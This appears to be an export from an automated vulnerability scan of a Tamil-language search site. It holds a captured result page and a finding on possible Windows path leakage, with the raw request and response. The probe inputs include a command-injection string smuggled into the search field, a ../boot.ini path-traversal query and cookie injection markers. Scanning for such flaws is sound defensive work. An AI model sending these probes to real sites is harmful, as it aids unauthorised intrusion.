<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><SCRIPT LANGUAGE="JavaScript">function showcheckbox(){ if(document.getElementById('thumbshotcheck').checked==true) { SetCookie( 'thumbshot', 'on', 7); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display=""; } } else { SetCookie( 'thumbshot', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display="none"; }}}function showcheckbox1(){if(document.getElementById('quicklookcheck').checked==true) { SetCookie( 'qlook', 'on', 7); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display=""; document.getElementById("qlookframe"+i).style.display=""; } } else { SetCookie( 'qlook', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display="none"; document.getElementById("qlookframe"+i).style.display="none"; }}}</script><title>Kroogy Search - வலை - &#039;&amp; ping -n 26 127.0.0.1 &amp;</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta name="description" content="Kroogy Search - வலை - &#039;&amp; ping -n 26 127.0.0.1 &amp;"><meta name="keywords" content="Kroogy Search,search,search engine,&#039;&amp; ping -n 26 127.0.0.1 &amp;,web"><style type="text/css"><!--body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--></style></head><body><table cellpadding="0" cellspacing="0" border="0" class="headertable" width="100%"><tr><td class="headerlinkstd" align="right"><span style="float:left;"><form name="displaysettings" id="displaysettings" enctype="multipart/form-data" method="post" action="http://kroogy.com/"> <input type="checkbox" name="thumbshotcheck" id="thumbshotcheck" checked="checked" onchange="javascript:showcheckbox()" > &nbsp;பெருவிரல்சுவடை காமி
&nbsp;&nbsp; <input type="checkbox" name="quicklookcheck" id="quicklookcheck" checked="checked" onchange="javascript:showcheckbox1()"> &nbsp;உள்பார்வை காமி </form></span><a class="headerlink" href="http://kroogy.com/index/advanced">மேம்பட்ட தேடல்</a> | <a class="headerlink" href="http://kroogy.com/">Kroogy Search முகப்பு</a></td></tr><tr><td><style><!---->.links{font-size:11px;color: grey;width: 125px;}.outermainadtd1{padding-top:10px;padding-left:0px;padding-right:10px;vertical-align:top;}.resultsetwrappertd{padding-right:50px;}</style><script src="js/qlook.js" language="JavaScript"></script><SCRIPT LANGUAGE="JavaScript">function SetCookie(cookieName,cookieValue,nDays) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires="+expire.toGMTString();}function urlencode(str){return escape(str).replace(/\+/g,'%2B').replace(/%20/g, '+').replace(/\*/g, '%2A').replace(/\//g, '%2F').replace(/@/g, '%40');}function popUp(URL){day = new Date();id = day.getTime();var returnurl="http://kroogy.com/search/emailafriend?url="+urlencode(URL);eval("page" + id + " = window.open(returnurl, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=605,height=400,left = 520,top = 150');");}</script><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr> <td align="left" class="outermainlogotd" ><a alt="Kroogy Search முகப்பு" title="Kroogy Search முகப்பு" href="http://kroogy.com/"> <img src="userdata/resultpagelogo.jpg" border="0"> </a></td> <td align="left" class="outermaintabtd"><script language="javascript"> function Determine(type,status){var term=document.getElementById('search').value;term=term.replace(/%/g, "%25");term=term.replace(/&/g, "%26");term=term.replace(/\+/g, "%2B");term=term.replace(/\//g, "%2F");term=term.replace(/#/g, "%23");if(term!=""){window.location="index.php?page=search/redir&type="+type+"&search="+term;}if(status=="0" && term=="")window.location="index.php?type="+type; }</script><script type="text/javascript">// JavaScript Documentvar xmlhttp;function showResult(str){ if (str.length==0) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; return; }xmlhttp=GetXmlHttpObject()if (xmlhttp==null) { alert ("Your browser does not support XML HTTP Request"); return; } document.getElementById("livesearch").style.padding="0px";type=document.searchform.type.value;var url="http://kroogy.com/index/livesearch";url=url+"&q="+str;url=url+"&type="+type;xmlhttp.onreadystatechange=stateChanged ;xmlhttp.open("GET",url,true);xmlhttp.send(null);}function stateChanged(){ if (xmlhttp.readyState==4) { document.getElementById("livesearch").innerHTML=xmlhttp.responseText; if(xmlhttp.responseText!="") { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; } else { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; } }}function GetXmlHttpObject(){if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari return new XMLHttpRequest(); }if (window.ActiveXObject) { // code for IE6, IE5 return new ActiveXObject("Microsoft.XMLHTTP"); }return null;}function setvaluefortb(text){ document.getElementById('search').value=text; document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.searchform.submit();}document.body.onclick= getMouseXY;function getMouseXY(e) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px";}var searchtext="";var counter=0;var old_char_count=0;var total_result_count=10;function keymovement(evt,textval) { var charCode = (evt.which) ? evt.which : event.keyCode //alert(charCode); if(charCode==40) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter+1; if(!document.getElementById('livesearch_a_'+counter)) { counter=0; } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==38) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter-1; if(!document.getElementById('livesearch_a_'+counter) && counter!=0) { for(i=total_result_count;i>0;i--) { if(document.getElementById('livesearch_a_'+i)) { counter=i; break; } } } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==37 || charCode==39 || charCode==17 || charCode==18) { } else if(charCode==27 ) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.getElementById('search').value=searchtext; } else if(charCode==13 ) { document.searchform.submit(); } else { searchtext=document.getElementById('search').value; showResult(textval); } }</script><style type="text/css"></style><form name="searchform" id="searchform" enctype="multipart/form-data" method="POST" action="http://kroogy.com/search/redir"><div class="containerdiv"><table cellpadding="0 " cellspacing="0" class="containertable"><tr><td class="containertabtd"><div class="tabsdiv"><div class="tabsdivinner"><table cellpadding="0" cellspacing="0" class="tabstable"><tr class="tabstr"> <td class="activetableft">&nbsp;</td> <td nowrap="nowrap" class="activetabcenter"><a class="activetablink" href="javascript:Determine('web','1');"><span>வலை</span></a></td> <td class="activetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('images','0');"><span>படம்</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('videos','0');"><span>ஒளி</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('news','0');"><span>செய்தி</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('sports','0');"><span>விளையாட்டு</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Audio','0');"><span>ஒலி</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Forum','0');"><span>போரும்</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Blog','0');"><span>இடுகை</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Wiki','0');"><span>விக்கிபீடியா</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('PDF','0');"><span>பிடியஃப்</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Amazon','0');"><span>Amazon</span></a></td> <td class="inactivetabright">&nbsp;</td></tr></table></div></div></td></tr><tr><td class="containersearchtd"><div class="searchdiv"><table cellpadding="0" cellspacing="0" class="searchtable" border="0"><tr><td class="searchtdleft">&nbsp;</td><td nowrap="nowrap" class="searchtdcenter" dir="ltr"><table cellpadding="0" cellspacing="0"><tr><td colspan="3" > <span class="searchfieldspan"><input type="hidden" name="type" value="web"><input autocomplete="off" onKeyUp="javascript:keymovement(event,this.value);" name="search" id="search" type="text" value="&#039;&amp; ping -n 26 127.0.0.1 &amp;" size="50" class="searchfield"></span><span class="searchbuttonspan"><input type="submit" name="searchbutton" value="தேடு" class="searchbutton"></span><span class="luckybuttonspan"><input type="submit" name="lucky" value="அதிர்ஷ்டம் என் பக்கம்" class="luckybutton"></span></td></tr><tr><td style="overflow:visible; width:380px;" valign="top" ><div id="livesearch" class="livesearch" ></div></td><td>&nbsp;</td><td>&nbsp;</td></tr></table></td><td class="searchtdright">&nbsp;</td></tr></table></div></td></tr></table></div></form> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> </td> </tr></table><table cellpadding="0" cellspacing="0" border="0" class="outermaincontainer"> <tr> <td colspan="2"> <table border="0" cellpadding="0" cellspacing="0" class="totaltable"> <tr> <td class="totaltd" align="left"><span class="totaltext">க்கான ஏறக்குறைய <span class="totalresults">180,000</span> இல் <span class="resultcountstart">1</span>-<span class="resultcountend">10</span> முடிவுகள்</span></td> <td class="typesearchtd" align="right"><span class="typesearchtext">தேடு வலை</span></td> </tr> <..
[Possible] Internal Path Leakage (Windows)

[Possible] Internal Path Leakage (Windows)

1 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker either to identify other vulnerabilities or during the exploitation of other identified vulnerabilities.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this file path was actually the real file path of the target web server.

External References

- /search/web

/search/web

http://kroogy.com/search/web?search=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&type=..

Identified Internal Path(s)

c:\boot.ini

Request

GET /search/web?search=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&type=web&fl=0 HTTP/1.1
Referer: http://kroogy.com/search/redir
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: kroogy.com
Cookie: language=8; region=AU-en; nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; region=%27%2BNSFTW%2B%27; PHPSESSID=totjukp6oqa5l5opadu8gndj05; language=%2A%2Fnetsparker%280x000055%29%3B%2F%2A; theme=%27%2BNSFTW%2B%27
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 13:06:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6,PleskLin
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 8421
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><SCRIPT LANGUAGE="JavaScript">function showcheckbox(){ if(document.getElementById('thumbshotcheck').checked==true) { SetCookie( 'thumbshot', 'on', 7); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display=""; } } else { SetCookie( 'thumbshot', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display="none"; }}}function showcheckbox1(){if(document.getElementById('quicklookcheck').checked==true) { SetCookie( 'qlook', 'on', 7); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display=""; document.getElementById("qlookframe"+i).style.display=""; } } else { SetCookie( 'qlook', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display="none"; document.getElementById("qlookframe"+i).style.display="none"; }}}</script><title>Kroogy Search - வலை - ../../../../../../../../../../boot.ini</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta name="description" content="Kroogy Search - வலை - ../../../../../../../../../../boot.ini"><meta name="keywords" content="Kroogy Search,search,search engine,../../../../../../../../../../boot.ini,web"><style type="text/css"><!--body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--></style></head><body><table cellpadding="0" cellspacing="0" border="0" class="headertable" width="100%"><tr><td class="headerlinkstd" align="right"><span style="float:left;"><form name="displaysettings" id="displaysettings" enctype="multipart/form-data" method="post" action="http://kroogy.com/"> <input type="checkbox" name="thumbshotcheck" id="thumbshotcheck" checked="checked" onchange="javascript:showcheckbox()" > &nbsp;பெருவிரல்சுவடை காமி
&nbsp;&nbsp; <input type="checkbox" name="quicklookcheck" id="quicklookcheck" checked="checked" onchange="javascript:showcheckbox1()"> &nbsp;உள்பார்வை காமி </form></span><a class="headerlink" href="http://kroogy.com/index/advanced">மேம்பட்ட தேடல்</a> | <a class="headerlink" href="http://kroogy.com/">Kroogy Search முகப்பு</a></td></tr><tr><td><style><!---->.links{font-size:11px;color: grey;width: 125px;}.outermainadtd1{padding-top:10px;padding-left:0px;padding-right:10px;vertical-align:top;}.resultsetwrappertd{padding-right:50px;}</style><script src="js/qlook.js" language="JavaScript"></script><SCRIPT LANGUAGE="JavaScript">function SetCookie(cookieName,cookieValue,nDays) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires="+expire.toGMTString();}function urlencode(str){return escape(str).replace(/\+/g,'%2B').replace(/%20/g, '+').replace(/\*/g, '%2A').replace(/\//g, '%2F').replace(/@/g, '%40');}function popUp(URL){day = new Date();id = day.getTime();var returnurl="http://kroogy.com/search/emailafriend?url="+urlencode(URL);eval("page" + id + " = window.open(returnurl, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=605,height=400,left = 520,top = 150');");}</script><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr> <td align="left" class="outermainlogotd" ><a alt="Kroogy Search முகப்பு" title="Kroogy Search முகப்பு" href="http://kroogy.com/"> <img src="userdata/resultpagelogo.jpg" border="0"> </a></td> <td align="left" class="outermaintabtd"><script language="javascript"> function Determine(type,status){var term=document.getElementById('search').value;term=term.replace(/%/g, "%25");term=term.replace(/&/g, "%26");term=term.replace(/\+/g, "%2B");term=term.replace(/\//g, "%2F");term=term.replace(/#/g, "%23");if(term!=""){window.location="index.php?page=search/redir&type="+type+"&search="+term;}if(status=="0" && term=="")window.location="index.php?type="+type; }</script><script type="text/javascript">// JavaScript Documentvar xmlhttp;function showResult(str){ if (str.length==0) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; return; }xmlhttp=GetXmlHttpObject()if (xmlhttp==null) { alert ("Your browser does not support XML HTTP Request"); return; } document.getElementById("livesearch").style.padding="0px";type=document.searchform.type.value;var url="http://kroogy.com/index/livesearch";url=url+"&q="+str;url=url+"&type="+type;xmlhttp.onreadystatechange=stateChanged ;xmlhttp.open("GET",url,true);xmlhttp.send(null);}function stateChanged(){ if (xmlhttp.readyState==4) { document.getElementById("livesearch").innerHTML=xmlhttp.responseText; if(xmlhttp.responseText!="") { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; } else { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; } }}function GetXmlHttpObject(){if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari return new XMLHttpRequest(); }if (window.ActiveXObject) { // code for IE6, IE5 return new ActiveXObject("Microsoft.XMLHTTP"); }return null;}function setvaluefortb(text){ document.getElementById('search').value=text; document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.searchform.submit();}document.body.onclick= getMouseXY;function getMouseXY(e) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px";}var searchtext="";var counter=0;var old_char_count=0;var total_result_count=10;function keymovement(evt,textval) { var charCode = (evt.which) ? evt.which : event.keyCode //alert(charCode); if(charCode==40) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter+1; if(!document.getElementById('livesearch_a_'+counter)) { counter=0; } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==38) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter-1; if(!document.getElementById('livesearch_a_'+counter) && counter!=0) { for(i=total_result_count;i>0;i--) { if(document.getElementById('livesearch_a_'+i)) { counter=i; break; } } } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==37 || charCode==39 || charCode==17 || charCode==18) { } else if(charCode==27 ) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.getElementById('search').value=searchtext; } else if(charCode==13 ) { document.searchform.submit(); } else { searchtext=document.getElementById('search').value; showResult(textval); } }</script><style type="text/css"></style><form name="searchform" id="searchform" enctype="multipart/form-data" method="POST" action="http://kroogy.com/search/redir"><div class="containerdiv"><table cellpadding="0 " cellspacing="0" class="containertable"><tr><td class="containertabtd"><div class="tabsdiv"><div class="tabsdivinner"><table cellpadding="0" cellspacing="0" class="tabstable"><tr class="tabstr"> <td class="activetableft">&nbsp;</td> <td nowrap="nowrap" class="activetabcenter"><a class="activetablink" href="javascript:Determine('web','1');"><span>வலை</span></a></td> <td class="activetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('images','0');"><span>படம்</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('videos','0');"><span>ஒளி</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('news','0');"><span>செய்தி</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('sports','0');"><span>விளையாட்டு</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Audio','0');"><span>ஒலி</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Forum','0');"><span>போரும்</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Blog','0');"><span>இடுகை</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Wiki','0');"><span>விக்கிபீடியா</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('PDF','0');"><span>பிடியஃப்</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Amazon','0');"><span>Amazon</span></a></td> <td class="inactivetabright">&nbsp;</td></tr></table></div></div></td></tr><tr><td class="containersearchtd"><div class="searchdiv"><table cellpadding="0" cellspacing="0" class="searchtable" border="0"><tr><td class="searchtdleft">&nbsp;</td><td nowrap="nowrap" class="searchtdcenter" dir="ltr"><table cellpadding="0" cellspacing="0"><tr><td colspan="3" > <span class="searchfieldspan"><input type="hidden" name="type" value="web"><input autocomplete="off" onKeyUp="javascript:keymovement(event,this.value);" name="search" id="search" type="text" value="../../../../../../../../../../boot.ini" size="50" class="searchfield"></span><span class="searchbuttonspan"><input type="submit" name="searchbutton" value="தேடு" class="searchbutton"></span><span class="luckybuttonspan"><input type="submit" name="lucky" value="அதிர்ஷ்டம் என் பக்கம்" class="luckybutton"></span></td></tr><tr><td style="overflow:visible; width:380px;" valign="top" ><div id="livesearch" class="livesearch" ></div></td><td>&nbsp;</td><td>&nbsp;</td></tr></table></td><td class="searchtdright">&nbsp;</td></tr></table></div></td></tr></table></div></form> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> </td> </tr></table><table cellpadding="0" cellspacing="0" border="0" class="outermaincontainer"> <tr> <td colspan="2"> <table border="0" cellpadding="0" cellspacing="0" class="totaltable"> <tr> <td class="totaltd" align="left"><span class="totaltext">க்கான ஏறக்குறைய <span class="totalresults">4,580,000</span> இல் <span class="resultcountstart">1</span>-<span class="resultcountend">10</span> முடிவுகள்</span></td> <td class="typesearchtd" align="right"><span class="typesearchtext">தேடு வலை</span></td> </tr> </table> </td> </tr><tr>&..